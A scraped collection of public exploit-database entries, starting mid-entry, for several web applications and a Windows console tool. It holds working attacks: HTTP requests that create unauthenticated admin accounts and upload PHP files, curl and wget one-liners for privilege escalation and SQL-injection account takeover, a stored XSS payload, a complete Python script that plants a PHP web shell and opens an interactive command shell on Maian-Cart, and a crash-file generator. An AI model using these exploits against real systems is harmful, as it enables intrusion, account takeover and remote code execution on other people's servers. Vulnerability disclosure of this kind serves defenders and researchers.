Content-Type: text/html; charset=UTF-8

{"status":"success"}

-----------------------------------------------------------------------------------------------------------------------
# Request to read file index.php again

GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8

Hacked other client files in this hosting!

-----------------------------------------------------------------------------------------------------------------------
## Example 4 - Performing operations by an unauthenticated user with application administrator rights

# The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable
# Request adding new admin user to application by sending a request by an authorized user

POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="id"

21
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="firstname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="lastname"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="username"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="password"

hack
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="type"

1
-----------------------------210106920639395210803657370685
Content-Disposition: form-data; name="img"; filename="aaa.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>

-----------------------------210106920639395210803657370685--

-----------------------------------------------------------------------------------------------------------------------
# Response

HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:50:36 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Connection: close
Content-Type: text/html; charset=UTF-8

1

# The request worked fine, log into the app using your hack account
HireHackking 
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Unauthenticated admin creation

Unauthenticated admin creation:
    
    Request:
        POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1
        Host: 127.0.0.1
        Content-Length: 42

        id=&fullname=admin2&username=admin2&type=1

    PoC to create an admin user named exploitdb and password exploitdb:
    curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin'
HireHackking 
# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)
# Google Dork: inurl:/plugins/pie-register/
# Date: 08.10.2021
# Exploit Author: Lotfi13-DZ
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: ubuntu

Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin).

Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null
HireHackking 
# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Unauthenticated password change leading to account takeover

Explanation: By setting the parameter old_password as array, the MD5 function on it returns null, so md5($old_password) == $_SESSION['password'] since we have no session, thus bypassing the check, after that we can use SQLI and inject our custom data.
    
    Request:
        POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Content-Length: 129

        id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test

    Vulnerable code in Actions.php:
        function update_credentials(){
            extract($_POST);
            $data = "";
            foreach($_POST as $k => $v){
                if(!in_array($k,array('id','old_password')) && !empty($v)){
                    if(!empty($data)) $data .= ",";
                    if($k == 'password') $v = md5($v);
                    $data .= " `{$k}` = '{$v}' ";
                }
            }
            ...
            if(!empty($password) && md5($old_password) != $_SESSION['password']){
                $resp['status'] = 'failed';
                $resp['msg'] = "Old password is incorrect.";
            }else{
                $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'";
                @$save = $this->query($sql);

    PoC that changes the password and username of user 'admin' to 'exploitdb':
        curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials'
HireHackking 
# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) 
# Date: 10/7/21
# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net)
# Software Link: https://pypi.org/project/django-unicorn/
# Version: <= 0.35.3
# CVE: CVE-2021-42053

django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests.

Step 1: Go to www.django-unicorn.com/unicorn/message/todo
Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet).


POC:

POST /unicorn/message/todo HTTP/2
Host: www.django-unicorn.com
Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Content-Length: 258
Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94""
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: application/json
X-Requested-With: XMLHttpRequest
X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z
Sec-Ch-Ua-Platform: ""Linux""
Origin: https://www.django-unicorn.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.django-unicorn.com/examples/todo
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

{""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""<img src=x onerror=alert(origin)>""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871}

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

HTTP/2 200 OK
Date: Thu, 07 Oct 2021 03:51:18 GMT
Content-Type: application/json
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
Via: 1.1 vegur
Cf-Cache-Status: DYNAMIC
Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct""
Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800}
Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800}
Server: cloudflare
Cf-Ray: 69a42b973f6a6396-ORD
Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400

{""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""<img src=x onerror=alert(origin)>""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""<div unicorn:id=\""Q43GSmJh\"" unicorn:name=\""todo\"" unicorn:key=\""\"" unicorn:checksum=\""ZQn54Ct4\"">\n<form unicorn:submit.prevent=\""add\"">\n<input type=\""text\"" unicorn:model.lazy=\""task\"" placeholder=\""New task\"" id=\""task\""/>\n</form>\n<button unicorn:click=\""add\"">Add</button>\n<p>\n<ul>\n<li><img src=x onerror=alert(origin)></li>\n</ul>\n<button unicorn:click=\""$reset\"">Clear all tasks</button>\n</p>\n</div>\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}"
"ENDTEXT"
HireHackking 
# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 27.11.2020 19:35
# Tested on: Ubuntu 20.04 LTS
# Exploit Author(s): DreyAnd, purpl3
# Software Link: https://www.maiancart.com/download.html
# Vendor homepage: https://www.maianscriptworld.co.uk/
# Version: Maian Cart 3.8
# CVE: CVE-2021-32172

#!/usr/bin/python3

import argparse
import requests
from bs4 import BeautifulSoup
import sys
import json
import time

parser = argparse.ArgumentParser()
parser.add_argument("host", help="Host to exploit (with http/https prefix)")
parser.add_argument("dir", help="default=/ , starting directory of the
maian-cart instance, sometimes is placed at /cart or /maiancart")
args = parser.parse_args()

#args

host = sys.argv[1]
directory = sys.argv[2]

#CREATE THE FILE

print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True)
time.sleep(1)

try:
    r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw")
    print(r.text)
    if "added" in r.text:
        print("\033[95mFile successfully created.\n\033[00m")
    else:
        print("\033[91mSome error occured.\033[00m")

except (requests.exceptions.RequestException):
    print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")

#GET THE FILE ID

time.sleep(1)

file_response = r.text
soup = BeautifulSoup(file_response,'html.parser')
site_json=json.loads(soup.text)
hash_id = [h.get('hash') for h in site_json['added']]
file_id =  str(hash_id).replace("['", "").replace("']", "")


print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m")
print("\n")

#WRITE TO THE FILE

print("\033[95mWritting the payload to the file...\033[00m")
print("\n")
time.sleep(1)

headers = {
    "Accept": "application/json, text/javascript, /; q=0.01",
    "Accept-Language" : "en-US,en;q=0.5",
    "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With" : "XMLHttpRequest",
    "Connection" : "keep-alive",
    "Pragma" : "no-cache",
    "Cache-Control" : "no-cache",
}

data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E"

try:
    write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder",
headers=headers, data=data)
    print(write.text)
except (requests.exceptions.RequestException):
    print("\033[91mThere was a connection issue. Check if you're
connected to wifi or if the host is correct\033[00m")


#EXECUTE THE PAYLOAD

print("\033[95mExecuting the payload...\033[00m")
print("\n")
time.sleep(1)

exec_host = f"{host}{directory}/product-downloads/shell.php"

print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser
url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m")
time.sleep(2)

while True:
    def main():
        execute = str(input("$ "))
        e = requests.get(f"{exec_host}?cmd={execute}")
        print(e.text)

    try:
        if __name__ == "__main__":
            main()
    except:
        exit = str(input("Do you really wish to exit? Y/N? "))

        if exit == "Y" or exit =="y":
            print("\033[91mExit detected. Removing the shell...\033[00m")
            remove =
requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}")
            print("\033[91m" , remove.text, "\033[00m")
            print("\033[91mBye!\033[00m")
            sys.exit(1)
        else:
            main()
HireHackking 
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10 

# [About - Cmder Console Emulator] :

#Cmder is a software package created over absence of usable console emulator on Windows.
#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.

# [Security Issue] : 

#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition. 
#E.g  λ cmder.cmd

# [POC] :

PAYLOAD=chr(235) + "\\CMDER"
PAYLOAD = PAYLOAD * 3000
with open("cmder.cmd", "w") as f:
f.write(PAYLOAD)